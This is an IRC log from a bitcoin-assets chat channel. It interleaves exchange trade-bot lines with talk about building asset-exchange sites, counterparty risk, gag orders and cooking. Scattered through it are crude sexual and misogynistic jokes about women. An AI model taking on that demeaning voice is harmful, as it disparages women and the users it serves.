net Nov 29 22:49:18 burnside that's not such a smart call. the wot is central. Nov 29 22:49:23 :P Nov 29 22:49:32 [MPEX] [S.MPOE] 7570 @ 0.00053313 = 4.0358 BTC [+] Nov 29 22:49:34 [MPEX] [S.MPOE] 2345 @ 0.00053706 = 1.2594 BTC [+] Nov 29 22:49:34 anywho Nov 29 22:49:35 [MPEX] [S.MPOE] 1229 @ 0.00053732 = 0.6604 BTC [+] Nov 29 22:49:36 [MPEX] [S.MPOE] 756 @ 0.00053735 = 0.4062 BTC [+] Nov 29 22:49:36 yeah, i'll do it eventually Nov 29 22:49:38 i have bitfudner part broken atm Nov 29 22:49:41 so i need to focus for a couple Nov 29 22:50:43 Ukto, later. nice work with the site. lemme know if there's anything I can help with security-wise, etc. Nov 29 22:50:49 I'm sure MP will assist too Nov 29 22:51:26 [MPEX] [S.MPOE] 1500 @ 0.00053076 = 0.7961 BTC [-] Nov 29 22:53:07 lol, the stats say that some people found their way to my blog via a google search for... Nov 29 22:53:12 wait for it... Nov 29 22:53:19 "google" Nov 29 22:54:41 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.19216735 = 192.1674 BTC [-] Nov 29 22:56:30 lol smickles ciuciu makes jokes you don't get! Nov 29 22:56:36 ahahaha that was kickass. Nov 29 22:56:54 I'm glad I entertain Nov 29 22:57:13 http://blog.smickles.com/bitcoin/developments-on-the-wikipedia-talk-page/ :P Nov 29 22:57:19 is this the usual bitcoin calibre of humour? Nov 29 22:57:22 what, still with that stuff ? Nov 29 22:57:24 'cause I know you like the topic mircea_popescu Nov 29 22:57:28 has the wikipedia quote even changed ? Nov 29 22:57:28 hay gais im a fish, no im not LOL Nov 29 22:57:41 dub sort-of i guess Nov 29 22:57:44 ala -otc Nov 29 22:57:47 except in this case the guy was a fish Nov 29 22:57:54 mircea_popescu: once, but it's still not 'neutral' but then they added the NPOV dispute tag Nov 29 22:58:01 you got troll im not really a fish bawhawhaw Nov 29 22:58:06 which is overall a worse outcome smickles Nov 29 22:58:16 cause now people will infer it's about the article not about some dumbass sentence Nov 29 22:58:35 mircea_popescu: its positioned right above that one sentense Nov 29 22:58:38 mp's theorem of wikipedia : any time sunk into wikipedia makes the world overall a worse place. Nov 29 22:58:38 *ce Nov 29 22:59:39 mircea_popescu: aslo, there are people actually asking me to write about the issue Nov 29 22:59:44 whats up with your blog header? Nov 29 22:59:54 whose ? Nov 29 23:00:01 smickles, the pic Nov 29 23:00:02 dub: the old and new shoes? Nov 29 23:00:16 I get, guy with shitty shoes getting fucked in the ass by guy with better shoes Nov 29 23:00:25 smickles is a shoe Nov 29 23:00:27 lolwut? Nov 29 23:00:41 dub: you thook that out of the pic? Nov 29 23:00:46 yeah Nov 29 23:00:53 0.0 Nov 29 23:00:54 outside pair is nicer shoes Nov 29 23:01:05 ok, dub is perverse. Nov 29 23:01:23 it's a comparison of my new shoes to my old shoes, lol Nov 29 23:01:27 inside kinda kowtowed Nov 29 23:02:02 well, i've got to leave it that way now Nov 29 23:02:21 [MPEX] [S.MPOE] 2345 @ 0.00053605 = 1.257 BTC [+] Nov 29 23:02:22 [MPEX] [S.MPOE] 9155 @ 0.00053611 = 4.9081 BTC [+] Nov 29 23:02:23 its teh average man getting fucked by the rich! Nov 29 23:02:27 dub: you can even see that the inner shoes are empty! Nov 29 23:02:43 not really, its kinda dark Nov 29 23:03:18 ah well, thanks for taking a gander at my blog :) Nov 29 23:03:43 its teh average man getting fucked by the rich! <<< :D Nov 29 23:04:10 and for making me laugh at my not seeing that possibility Nov 29 23:04:27 its a great theme for finance related blog tbh Nov 29 23:04:32 ftr smickles i always thought it's your wife's shoes in the middle Nov 29 23:04:36 and hence inferred she's also taller than you Nov 29 23:05:12 dub maybe you should start one. Nov 29 23:05:32 heh, they are both mine tho, so .. i'm taller than myself? Oh hey, I'm larger than life !@ Nov 29 23:05:52 a blog? I can hardly be bothered ranting on twitter Nov 29 23:06:32 you should be put into one of those male chastity belts and only allowed out ~half hour after you've posted a good article Nov 29 23:06:47 i know a coupla pretty famous cooking blogs that work on that principle. Nov 29 23:07:24 actually that is somethign I've thought about Nov 29 23:07:51 sharing my culinary adventures Nov 29 23:08:05 so there you go Nov 29 23:08:25 mrs dub wouldn't go for the chastity belt thing tho Nov 29 23:09:30 I actually tend to wait till she begs for it Nov 29 23:10:09 a well Nov 29 23:10:33 so, i dunno, maybe I'd need to be tied up or somehting for that modality to work for me Nov 29 23:11:09 lol, "Spontaneous kindness is to hipsters as high beams are to deer." Nov 29 23:13:04 so I made up a sauce the other night, a traditional (home made) mint sauce turned into a buerre blanc, was quite impressed with myself Nov 29 23:13:21 what is this faggotry! Nov 29 23:13:58 real men eat bearing balls. Nov 29 23:14:02 sorry, not up to your fish froma tube sandwiches :) Nov 29 23:14:17 [MPEX] [S.MPOE] 10089 @ 0.00053611 = 5.4088 BTC [+] Nov 29 23:14:18 [MPEX] [S.MPOE] 5761 @ 0.00053735 = 3.0957 BTC [+] Nov 29 23:15:08 that was truly frightening to me, I knew about cheese in a can but fish? Nov 29 23:15:49 ehehe Nov 29 23:15:56 you should go to sweden. Nov 29 23:16:11 they have shops dedicated to fish in a tube. Nov 29 23:16:16 obv. I know about canned fish, guess its just different packaging Nov 29 23:16:31 let's call it an european thing. Nov 29 23:17:16 yes, I'm a bit spoiled, plenty of good fish int he sea 800m from my front door Nov 29 23:17:26 but that's not smoked. Nov 29 23:17:39 i like fresh fish, don't get me wrong, but something like winter sprats Nov 29 23:17:52 or smoked salmon, or cured herring etc can't be matched. Nov 29 23:17:58 21:13 < mircea_popescu> real men eat bearing balls. << or quoran cooked bacon, right? Nov 29 23:18:06 lol that's right. Nov 29 23:18:56 smoking a fish takes a stainless steel box and 20 minutes Nov 29 23:19:34 and you get to fuck with what kind of wood/spices are flavouring it Nov 29 23:20:02 get out Nov 29 23:20:07 smoking takes days. Nov 29 23:20:17 nope Nov 29 23:20:21 sigh Nov 29 23:21:19 ;;google how to smoke a fish Nov 29 23:21:20 How to Smoke Salmon - Fish and Seafood Cooking - About.com: ; How To Smoke Fish: ; Fish: Smoking - Your Complete Guide to Smoking Fish: Nov 29 23:21:52 about com Nov 29 23:21:56 that fucking spamsite ;/ Nov 29 23:26:58 yes those links suck Nov 29 23:27:41 http://www.youtube.com/watch?v=A3gnctsSv20 Nov 29 23:28:13 [MPEX] [S.MPOE] 2345 @ 0.00053679 = 1.2588 BTC [-] Nov 29 23:28:15 [MPEX] [S.MPOE] 755 @ 0.00053648 = 0.405 BTC [-] Nov 29 23:34:40 [MPEX] [S.MPOE] 2345 @ 0.00053716 = 1.2596 BTC [+] Nov 29 23:34:41 [MPEX] [S.MPOE] 3157 @ 0.00053735 = 1.6964 BTC [+] Nov 29 23:34:43 [MPEX] [S.MPOE] 1000 @ 0.00053741 = 0.5374 BTC [+] Nov 29 23:34:43 [MPEX] [S.MPOE] 24148 @ 0.00053742 = 12.9776 BTC [+] Nov 29 23:39:03 [MPEX] [S.MPOE] 2345 @ 0.00053657 = 1.2583 BTC [-] Nov 29 23:39:04 [MPEX] [S.MPOE] 12055 @ 0.00053648 = 6.4673 BTC [-] Nov 29 23:42:04 [MPEX] [S.MPOE] 2345 @ 0.00053681 = 1.2588 BTC [+] Nov 29 23:42:05 [MPEX] [S.MPOE] 2490 @ 0.00053648 = 1.3358 BTC [-] Nov 29 23:42:07 [MPEX] [S.MPOE] 8965 @ 0.00053168 = 4.7665 BTC [-] Nov 29 23:52:31 [MPEX] [S.MPOE] 11000 @ 0.00053168 = 5.8485 BTC [-] Nov 29 23:53:23 okay, so live.coinbr.com has now an inconspicuos combobox added Nov 29 23:54:00 cool beans! Nov 29 23:54:41 course price doesn't correctly scale now for month and week :D Nov 29 23:55:38 just a hack for now. should do proper candle + volume graphs Nov 29 23:56:55 [MPEX] [S.MPOE] 4685 @ 0.00053168 = 2.4909 BTC [-] Nov 29 23:56:56 [MPEX] [S.MPOE] 1533 @ 0.00053064 = 0.8135 BTC [-] Nov 29 23:56:58 [MPEX] [S.MPOE] 9882 @ 0.00052957 = 5.2332 BTC [-] Nov 29 23:59:03 yeah. it is nice to have Nov 30 00:00:14 month graph looks like fractal function Nov 30 00:01:11 it does have a certain beauty to it Nov 30 00:05:03 [MPEX] [S.MPOE] 12318 @ 0.00052957 = 6.5232 BTC [-] Nov 30 00:05:04 [MPEX] [S.MPOE] 7650 @ 0.00052939 = 4.0498 BTC [-] Nov 30 00:05:06 [MPEX] [S.MPOE] 8371 @ 0.00052897 = 4.428 BTC [-] Nov 30 00:07:51 [MPEX] [S.MPOE] 14733 @ 0.00053379 = 7.8643 BTC [+] Nov 30 00:08:58 [MPEX] [S.MPOE] 17050 @ 0.00053379 = 9.1011 BTC [+] Nov 30 00:11:18 [MPEX] [S.MPOE] 21417 @ 0.00053379 = 11.4322 BTC [+] Nov 30 00:11:19 [MPEX] [S.MPOE] 2483 @ 0.00053439 = 1.3269 BTC [+] Nov 30 00:13:59 [MPEX] [S.MPOE] 10058 @ 0.00052897 = 5.3204 BTC [-] Nov 30 00:19:31 [MPEX] [S.MPOE] 11786 @ 0.00052897 = 6.2344 BTC [-] Nov 30 00:19:32 [MPEX] [S.MPOE] 10714 @ 0.00052716 = 5.648 BTC [-] Nov 30 00:25:23 [MPEX] [S.MPOE] 23236 @ 0.00052716 = 12.2491 BTC [-] Nov 30 00:25:24 [MPEX] [S.MPOE] 6414 @ 0.00052563 = 3.3714 BTC [-] Nov 30 00:38:41 [MPEX] [S.MPOE] 15297 @ 0.00052563 = 8.0406 BTC [-] Nov 30 00:38:42 [MPEX] [S.MPOE] 1670 @ 0.00052514 = 0.877 BTC [-] Nov 30 00:45:43 i envy mpoe-pr now... answering 3 simple questions took me 40 minutes :/ Nov 30 00:46:03 how does she manage? Nov 30 00:46:19 type real fast Nov 30 00:46:20 jurov she's a girl. Nov 30 00:46:53 i type reasonably fast... yeah, maybe other body parts are the culprit Nov 30 00:53:38 [MPEX] [S.MPOE] 13780 @ 0.00052514 = 7.2364 BTC [-] Nov 30 00:53:39 [MPEX] [S.MPOE] 4270 @ 0.0005247 = 2.2405 BTC [-] Nov 30 00:54:23 jurov that's good cause she said "haha. he's got more https://bitcointalk.org/index.php?topic=102181.msg1367272#msg1367272" Nov 30 00:58:40 ;) Nov 30 00:58:51 pigeons https://bitcointalk.org/index.php?topic=128437.0 that's a nice story. Nov 30 00:59:28 and i tell you, the only thing better than having a girl making sandwiches is having a girl making btctalk summaries. Nov 30 00:59:44 is that before or after blowjobs? Nov 30 00:59:52 yes. Nov 30 01:00:11 burnside re the quoting things : afaik frenode policy is that it's up to each chan owner to set up policy. Nov 30 01:00:27 i've been quoting -assets abundantly, such as Nov 30 01:00:48 http://trilema.com/2012/bitcoin-wittgenstein-assets/ Nov 30 01:00:49 kakobreklaaa: take a look at thge my ask/bid (cancel) button now Nov 30 01:00:55 [MPEX] [S.MPOE] 19300 @ 0.0005273 = 10.1769 BTC [+] Nov 30 01:00:55 out of maybe two dozen or w/e Nov 30 01:00:55 [MPEX] [S.MPOE] 5417 @ 0.00053439 = 2.8948 BTC [+] Nov 30 01:00:56 [MPEX] [S.MPOE] 1433 @ 0.00053742 = 0.7701 BTC [+] Nov 30 01:01:04 Not only did I get things visually correct, added even MORE info to the cancel button Nov 30 01:04:49 [MPEX] [S.MPOE] 2345 @ 0.00053726 = 1.2599 BTC [-] Nov 30 01:04:51 [MPEX] [S.MPOE] 2345 @ 0.00053732 = 1.26 BTC [+] Nov 30 01:04:52 [MPEX] [S.MPOE] 471 @ 0.00053742 = 0.2531 BTC [+] Nov 30 01:04:53 [MPEX] [S.MPOE] 2089 @ 0.00053747 = 1.1228 BTC [+] Nov 30 01:07:04 MP, sounds good, thx for that. Nov 30 01:09:10 burnside: watch out, MP will quote you talking shitty about other ppl / other ppls sites Nov 30 01:09:10 :P Nov 30 01:09:50 I try not to talk shitty, karma's a bitch Nov 30 01:10:02 iusually odnt Nov 30 01:10:06 I know better Nov 30 01:10:09 'usually' Nov 30 01:10:19 i still think somethings diff. from what I saw tho :/ Nov 30 01:10:56 eh, only thing I could think of is that I shortend the text in the tabs on the market Nov 30 01:11:06 mebbe Nov 30 01:11:11 I just remember something blarring out at my eyes Nov 30 01:11:12 lol Nov 30 01:11:16 enough that I quickly closed it Nov 30 01:11:17 that was a made up quote for humour, ftr. Nov 30 01:11:25 u sure Nov 30 01:11:28 yup Nov 30 01:11:29 I said that about someones Nov 30 01:11:30 :P Nov 30 01:11:32 i was just trolling you Nov 30 01:11:43 if not I said it to someone else Nov 30 01:11:43 :P Nov 30 01:11:52 lol Nov 30 01:11:57 if you did prolly not here tho Nov 30 01:12:01 thought it coulda been a diff site Nov 30 01:12:03 i literally typed it out Nov 30 01:12:29 I -know- it's a web 1.0 looking site Nov 30 01:12:38 so you're not gonna hurt my feelings Nov 30 01:13:06 it has 2 images. the favicon, and the geotrust label. Nov 30 01:13:26 actually i found i Nov 30 01:13:27 t Nov 30 01:13:30 I'm just not graphically inclined Nov 30 01:13:34 i was talking to someone in pm Nov 30 01:13:52 what was the url you were at? Nov 30 01:14:00 they mentioned it, i opened it and said 'wow. layout needs a crap ton of work' Nov 30 01:14:10 similar enough to 'its kinda shitty' :P Nov 30 01:14:22 heh. ;) Nov 30 01:14:29 or easily confused with Nov 30 01:14:30 hehe Nov 30 01:14:58 http://www.btct.co Nov 30 01:15:00 yeh, its the same Nov 30 01:15:05 yup, that's the one. Nov 30 01:15:31 your gonna charge 0.01btc per withdraw and 0.2% trading fee? Nov 30 01:16:00 also.. under what unique about btctc. you write trading of assets in btc... Nov 30 01:16:06 arent all asset exchanges doing it that way? Nov 30 01:16:20 https://bitcointalk.org/index.php?topic=112443.msg1226443#msg1226443 lol. this guy should be on irc Nov 30 01:16:28 o wait, he is. hai vampireb Nov 30 01:16:43 MP: lol Nov 30 01:16:44 nice Nov 30 01:17:13 Ukto, nah, it's same codebase as litecoinglobal.com, so over there you can see it reads: "trading of assets in ltc" Nov 30 01:17:15 heh Nov 30 01:17:34 which on litecoinglobal was unique Nov 30 01:17:41 not so much for btc-tc Nov 30 01:17:56 only diff between the two sites is a config file Nov 30 01:18:11 and I guess the css file Nov 30 01:18:30 lol Nov 30 01:18:59 which I definitely need to hand off to someone that isn't colorblind. Nov 30 01:19:51 hey its burnside, the gang's all here Nov 30 01:20:07 [MPEX] [S.MPOE] 3600 @ 0.00053399 = 1.9224 BTC [-] Nov 30 01:20:08 [MPEX] [S.MPOE] 5200 @ 0.00053747 = 2.7948 BTC [+] Nov 30 01:20:22 more bang for the gang! Nov 30 01:21:30 [MPEX] [S.MPOE] 29100 @ 0.00053747 = 15.6404 BTC [+] Nov 30 01:21:48 burnside: also, on BF, under the held assets page, it gives an est. value per asset based on last trade price Nov 30 01:21:48 :) Nov 30 01:21:51 hey, yeah... re-discovering irc. Nov 30 01:22:19 although, i really should add a total total price Nov 30 01:23:00 yeah, ltc-global/btc-tc has that in one of the portfolio tabs... definitely good to have. Nov 30 01:23:12 I need to figure out how to make it take the order book into account tho. Nov 30 01:23:33 give a value along the lines of "if I want to liquidate now, what would I get?" Nov 30 01:25:50 there, total total done Nov 30 01:26:11 burnside: thats not worth the trouble Nov 30 01:26:12 i think Nov 30 01:26:21 cause alot of times, like when I used glbse Nov 30 01:26:28 if I sold off all my JAH shares.. Nov 30 01:26:45 rather. when my account was *cough*"hacked"*cough* and "someone" sold off all my JAH shares Nov 30 01:26:48 it emptied the market Nov 30 01:26:53 100% for JAH buys Nov 30 01:26:59 heh, yeah, no depth Nov 30 01:27:06 so its not worth doing honestly Nov 30 01:27:10 would be too inacurate Nov 30 01:27:12 who knows what the difinition of an asset is? Nov 30 01:27:12 [MPEX] [S.MPOE] 2345 @ 0.00052477 = 1.2306 BTC [-] Nov 30 01:27:13 [MPEX] [S.MPOE] 22204 @ 0.0005247 = 11.6504 BTC [-] Nov 30 01:27:14 [MPEX] [S.MPOE] 7319 @ 0.0005244 = 3.8381 BTC [-] Nov 30 01:27:14 that's what I'm getting at. part of the value is "how much depth is there backing up this price?" Nov 30 01:27:15 [MPEX] [S.MPOE] 12232 @ 0.00052392 = 6.4086 BTC [-] Nov 30 01:27:16 well, at least not worth anyones time Nov 30 01:27:19 *definition Nov 30 01:27:31 jcpham: me Nov 30 01:27:41 oh. n/m. i misread that Nov 30 01:27:41 :P Nov 30 01:27:54 point in case. Nov 30 01:27:58 Anything tangible or intangible that is capable of being owned or controlled to produce value and that is held to have positive economic value is considered an asset. Nov 30 01:28:10 tangible or intangible that is capable of being owned or controlled Nov 30 01:28:15 owned or controlled Nov 30 01:28:37 controlled is another story Nov 30 01:28:41 it seems to be me that assets based on bitcoin are bullshit Nov 30 01:28:52 based on control Nov 30 01:29:01 because you lose that once you give up your btc Nov 30 01:29:04 jcpham there's an or in there Nov 30 01:29:07 what about assets based on mining equipement? Nov 30 01:29:18 it's not owned and controlled. Nov 30 01:29:25 i think i'm specifically talking about intangibles Nov 30 01:29:37 but i have some serious issues with this concept Nov 30 01:29:47 bonds and intangibles that bear fruit Nov 30 01:29:57 dont get into clinton.. "Your honor, that depends. How do you define 'IS'?" Nov 30 01:30:36 [MPEX] [S.MPOE] 2345 @ 0.00053659 = 1.2583 BTC [+] Nov 30 01:30:37 [MPEX] [S.MPOE] 23900 @ 0.00053685 = 12.8307 BTC [+] Nov 30 01:30:39 one lesson i forgot somewhere along the way and then re-learned Nov 30 01:30:39 [MPEX] [S.MPOE] 2081 @ 0.00053747 = 1.1185 BTC [+] Nov 30 01:30:40 how;s a btc bond different from a usd bank account ? Nov 30 01:30:46 one day the bank tells you to fuck off. what then ? Nov 30 01:30:46 if it isn't on the blockchain, it isn't real Nov 30 01:31:16 any bitcoins i give to someone to control some thing are gone Nov 30 01:31:33 how is this different from a bank account! Nov 30 01:31:37 well there is some level of counterparty risk in most things that involve a counterparty Nov 30 01:31:39 time Nov 30 01:31:46 what time ? Nov 30 01:32:04 the passage of time Nov 30 01:32:08 i don't get it. Nov 30 01:32:08 but your point is very valid Nov 30 01:32:20 one day you go to your bank, they tell you to fuck off. what now ? Nov 30 01:32:30 maybe they got one of those "secret" presidential orders to steal your money. Nov 30 01:32:33 guess i'm fubar Nov 30 01:32:40 maybe they just stole it a la madoff Nov 30 01:32:54 maybe they just stole it a la that broker that mixed client funds recently. Nov 30 01:32:54 that's why i can't give my btc to any entity Nov 30 01:33:03 for any "asset" Nov 30 01:33:10 well, not like you have to. Nov 30 01:33:20 in btc you have this advantage, that cash makes sense. Nov 30 01:33:24 in fiat you pretty much HAVE TO Nov 30 01:33:32 yeah Nov 30 01:34:07 my only point is that many of the so-called assets, the name of this channel Nov 30 01:34:10 [MPEX] [S.MPOE] 9130 @ 0.00053747 = 4.9071 BTC [+] Nov 30 01:34:12 [MPEX] [S.MPOE] 9070 @ 0.0005376 = 4.876 BTC [+] Nov 30 01:34:25 they aren't exactly all assets in the conventiuonal sense Nov 30 01:34:32 for sure not. they're btc assets Nov 30 01:34:36 hence bitcoin-assets. Nov 30 01:34:45 seems like an oxymoron to me Nov 30 01:34:56 yelp. welcome to #bitcoin-asshats. :P Nov 30 01:35:19 in that sense, united states is an oxymoron. Nov 30 01:35:26 haha Nov 30 01:35:30 good call Nov 30 01:35:39 lol Nov 30 01:36:22 and it gets worse than that Nov 30 01:36:31 any woman you marry could be fucking around behind your back Nov 30 01:36:39 any children you have may not be yours but the milkman's Nov 30 01:36:43 it's a tough world out there. Nov 30 01:37:07 ( proof http://polimedia.us/dtng/c/src/128215357439.jpg ) Nov 30 01:43:20 [MPEX] [S.MPOE] 4658 @ 0.0005291 = 2.4645 BTC [-] Nov 30 01:49:44 [MPEX] [S.MPOE] 14341 @ 0.0005291 = 7.5878 BTC [-] Nov 30 01:50:21 mircea_popescu: cancel button on the order books now works Nov 30 01:50:23 however.. Nov 30 01:50:34 when done you end up on the myassets page Nov 30 01:51:15 but it at lesat works Nov 30 01:52:53 hey, anyone knows the people developing planeshift ? Nov 30 01:55:54 [MPEX] [S.MPOE] 19200 @ 0.00052895 = 10.1558 BTC [-] Nov 30 02:01:37 As of 19 November 2012, Crypto x Change stopped allowing trades. There have been a couple of incidents in which we are not allowed to make public which have forced us to close the exchange. Nov 30 02:01:41 hm Nov 30 02:02:09 the stupidity of the us government shines through : by making such bs gagged stuff the law of the land there, they've empowered any scammer anywhere Nov 30 02:02:18 since anyone can claim this Nov 30 02:06:40 [MPEX] [S.MPOE] 6551 @ 0.0005291 = 3.4661 BTC [+] Nov 30 02:08:51 [MPEX] [S.MPOE] 11423 @ 0.0005376 = 6.141 BTC [+] Nov 30 02:12:10 http://i.imgur.com/uQg4I.jpg Nov 30 02:12:59 https://www.newgrounds.com/collection/supermariobrosz Nov 30 02:14:01 [MPEX] [S.MPOE] 2345 @ 0.00053476 = 1.254 BTC [-] Nov 30 02:14:02 [MPEX] [S.MPOE] 11849 @ 0.00053445 = 6.3327 BTC [-] Nov 30 02:14:04 [MPEX] [S.MPOE] 3200 @ 0.00052895 = 1.6926 BTC [-] Nov 30 02:14:04 [MPEX] [S.MPOE] 17189 @ 0.00052726 = 9.0631 BTC [-] Nov 30 02:15:30 best part about a gag order Nov 30 02:15:58 is that if your actions of no information lead to a court Nov 30 02:16:12 you cannot even defend yourself to the judge or explain the gag order Nov 30 02:16:30 that gag order itself is covered Nov 30 02:21:39 pff Nov 30 02:21:41 is all i have to say Nov 30 02:22:23 it's bullshit and you'd have to be an idiot to follow it. Nov 30 02:30:28 catfight https://bitcointalk.org/index.php?topic=118551.msg1367844#msg1367844 Nov 30 02:30:41 capslock, the difference between following and not following court orders Nov 30 02:34:49 no court has the authority to issue secret orders. Nov 30 02:34:58 court proceedings are either public or imaginary. Nov 30 02:35:31 [MPEX] [S.MPOE] 2345 @ 0.00053229 = 1.2482 BTC [+] Nov 30 02:35:33 [MPEX] [S.MPOE] 1055 @ 0.00053207 = 0.5613 BTC [-] Nov 30 02:35:41 what about name suppression? Nov 30 02:37:05 nope. Nov 30 02:37:46 well reality is the court can do most anythign it wants and does Nov 30 02:37:52 so can i. Nov 30 02:37:54 including illegal things Nov 30 02:37:54 heh, catfight. :P Nov 30 02:37:55 dun dun dun. Nov 30 02:38:16 the burden of persuasion is on the court/legal system i'm affraid. Nov 30 02:38:31 my fucked by a lady judge comment e.g. relates to a completely illegal ruling I had against me Nov 30 02:38:46 so quash it. Nov 30 02:39:03 without $10k's to fight it when I was 18 I'm stuck with it Nov 30 02:39:15 sucks. Nov 30 02:39:27 my lawyer said 'yes that is unusual' and that was that Nov 30 02:39:40 obviously courts make mistakes. mistakes happen. Nov 30 02:39:55 but otherwise... better not start fucking up with the wrong people. so life goes. Nov 30 02:41:34 then the last lady judge I stood before actually apologised as she convicted me Nov 30 02:41:52 lol just how many times did you get convicted ? Nov 30 02:41:58 a few :) Nov 30 02:42:13 last one was for drink driving I was only just over teh limit Nov 30 02:42:33 and I offered no bullshit sob story like the preceedign few asshats Nov 30 02:42:43 heh. Nov 30 02:51:33 [MPEX] [S.MPOE] 25100 @ 0.00053272 = 13.3713 BTC [+] Nov 30 02:51:34 [MPEX] [S.MPOE] 1574 @ 0.00053207 = 0.8375 BTC [-] Nov 30 02:59:42 [MPEX] [S.MPOE] 24921 @ 0.00053207 = 13.2597 BTC [-] Nov 30 02:59:44 [MPEX] [S.MPOE] 7929 @ 0.00053 = 4.2024 BTC [-] Nov 30 03:02:14 [MPEX] [S.MPOE] 9811 @ 0.00053 = 5.1998 BTC [-] Nov 30 03:02:15 [MPEX] [S.MPOE] 6889 @ 0.00052726 = 3.6323 BTC [-] Nov 30 03:13:13 [MPEX] [S.MPOE] 3900 @ 0.00053576 = 2.0895 BTC [+] Nov 30 03:19:25 [MPEX] [S.MPOE] 10800 @ 0.0005364 = 5.7931 BTC [+] Nov 30 03:21:24 [MPEX] [S.MPOE] 300 @ 0.00053617 = 0.1609 BTC [-] Nov 30 03:21:25 [MPEX] [S.MPOE] 2345 @ 0.00053742 = 1.2602 BTC [+] Nov 30 03:21:26 [MPEX] [S.MPOE] 807 @ 0.0005376 = 0.4338 BTC [+] Nov 30 03:21:27 [MPEX] [S.MPOE] 14800 @ 0.00053761 = 7.9566 BTC [+] Nov 30 03:21:28 [MPEX] [S.MPOE] 5198 @ 0.00053766 = 2.7948 BTC [+] Nov 30 03:23:22 [MPEX] [S.MPOE] 2345 @ 0.00053758 = 1.2606 BTC [-] Nov 30 03:23:23 [MPEX] [S.MPOE] 8569 @ 0.00053766 = 4.6072 BTC [+] Nov 30 03:23:25 [MPEX] [S.MPOE] 23650 @ 0.00053778 = 12.7185 BTC [+] Nov 30 03:23:26 [MPEX] [S.MPOE] 1486 @ 0.00053778 = 0.7991 BTC [+] Nov 30 03:26:03 [MPEX] [S.MPOE] 2345 @ 0.0005337 = 1.2515 BTC [-] Nov 30 03:26:05 [MPEX] [S.MPOE] 15810 @ 0.0005334 = 8.4331 BTC [-] Nov 30 03:26:06 [MPEX] [S.MPOE] 3022 @ 0.00052726 = 1.5934 BTC [-] Nov 30 03:26:07 [MPEX] [S.MPOE] 4223 @ 0.00052629 = 2.2225 BTC [-] Nov 30 03:31:22 [MPEX] [S.DICE] 435 @ 0.00328634 = 1.4296 BTC [-] Nov 30 03:31:24 [MPEX] [S.DICE] 700 @ 0.00328068 = 2.2965 BTC [-] Nov 30 03:31:24 [MPEX] [S.DICE] 3337 @ 0.0032796 = 10.944 BTC [-] Nov 30 03:47:29 woot woot Nov 30 03:47:43 I just integrated my new design with WHMCS Nov 30 03:47:48 It now looks neat Nov 30 03:48:33 [MPEX] [S.MPOE] 2345 @ 0.00053753 = 1.2605 BTC [+] Nov 30 03:48:34 [MPEX] [S.MPOE] 19172 @ 0.00053768 = 10.3084 BTC [+] Nov 30 03:48:35 [MPEX] [S.MPOE] 5383 @ 0.00053778 = 2.8949 BTC [+] Nov 30 03:52:11 [MPEX] [S.MPOE] 5174 @ 0.00053778 = 2.7825 BTC [+] Nov 30 03:52:12 [MPEX] [S.MPOE] 7726 @ 0.0005378 = 4.155 BTC [+] Nov 30 04:02:43 lol http://shrani.si/f/2i/6F/2gHEulwJ/kalm2.png Nov 30 04:04:16 [MPEX] [S.MPOE] 8650 @ 0.00053126 = 4.5954 BTC [-] Nov 30 04:04:18 [MPEX] [S.MPOE] 2345 @ 0.00052641 = 1.2344 BTC [-] Nov 30 04:04:19 [MPEX] [S.MPOE] 6405 @ 0.00052629 = 3.3709 BTC [-] Nov 30 04:10:50 [MPEX] [S.MPOE] 2345 @ 0.00053235 = 1.2484 BTC [+] Nov 30 04:10:51 [MPEX] [S.MPOE] 10522 @ 0.00053234 = 5.6013 BTC [-] Nov 30 04:14:36 [MPEX] [S.MPOE] 9920 @ 0.00052807 = 5.2385 BTC [-] Nov 30 04:26:48 http://trilema.com/2012/visual-culture-test-the-naked-woman/ Nov 30 04:26:56 guess the source, win 1 bitcoin. Nov 30 04:30:37 https://www.youtube.com/watch?v=jk07gVXAQKE around 0:40 Nov 30 04:31:14 mircea_popescu: ^ Nov 30 04:34:06 da2ce7_d darkee DBordello Diablo-D3 drug_motor dub Nov 30 04:34:13 Diablo-D3 well, post there, and name it would you Nov 30 04:34:16 i dun have flash Nov 30 04:34:32 mircea_popescu: use html5 then Nov 30 04:34:45 youtube has supported it for years Nov 30 04:34:56 i am lol. not all stuff shows tho. but srsly, leave comment. Nov 30 04:35:03 I have no clue what th eguy is saying, btw Nov 30 04:35:10 apparently its a polish translation of monty python Nov 30 04:36:00 lol so howdja find it? Nov 30 04:36:26 I cant find it without the fucking polish Nov 30 04:36:32 Ive seen the episode Nov 30 04:36:54 aite, well, post it as a comment, get your bitcoin. Nov 30 04:37:44 posted. Nov 30 04:38:40 [MPEX] [S.MPOE] 15400 @ 0.00053528 = 8.2433 BTC [+] Nov 30 04:38:41 [MPEX] [S.MPOE] 14849 @ 0.00053285 = 7.9123 BTC [-] Nov 30 04:38:42 [MPEX] [S.MPOE] 7051 @ 0.00053032 = 3.7393 BTC [-] Nov 30 04:39:00 you can see its MP by the quality of image Nov 30 04:39:25 yeah, or the content Nov 30 04:39:36 man, why the fuck cant I find this in the original english Nov 30 04:40:05 kakobreklaaa: got the cancel stuff all done for the order books Nov 30 04:40:11 ok Nov 30 04:40:12 also included the number of shares on the btton Nov 30 04:40:19 im not your boss you know Nov 30 04:40:22 so you know how many are yours Nov 30 04:40:23 [MPEX] [S.MPOE] 2362 @ 0.00053032 = 1.2526 BTC [-] Nov 30 04:40:24 [MPEX] [S.MPOE] 7238 @ 0.00052937 = 3.8316 BTC [-] Nov 30 04:40:27 nah, it was a great idea Nov 30 04:40:34 mircea_popescu: posted comment Nov 30 04:40:35 and it gave me a reason to fixup the page more Nov 30 04:40:37 looks much better now Nov 30 04:41:02 i also added pagination && searching to the trade history page Nov 30 04:41:24 so ppl can quickly sort to X assets, or Y date just by typing Nov 30 04:42:03 if you guys come up wiht anything else, lemme know. :) Nov 30 04:42:10 otherwise. i will start on api Nov 30 04:42:18 [MPEX] [S.MPOE] 2345 @ 0.00053749 = 1.2604 BTC [+] Nov 30 04:42:20 [MPEX] [S.MPOE] 7755 @ 0.0005378 = 4.1706 BTC [+] Nov 30 04:42:26 at least, start debating how I am going to do the api Nov 30 04:43:38 Diablo-D3 and answered! Nov 30 04:44:05 kakobreklaaa maybe you should wear moare leather and a whip Nov 30 04:44:15 people would make a bee line for your uservices Nov 30 04:44:22 and by people i mean web developers. Nov 30 04:44:28 mircea_popescu: bleh, I cant reply to a reply Nov 30 04:44:42 LOL Nov 30 04:44:44 Diablo-D3 it's not nested, you just reply Nov 30 04:44:47 :P Nov 30 04:44:52 looks nested Nov 30 04:45:04 i only 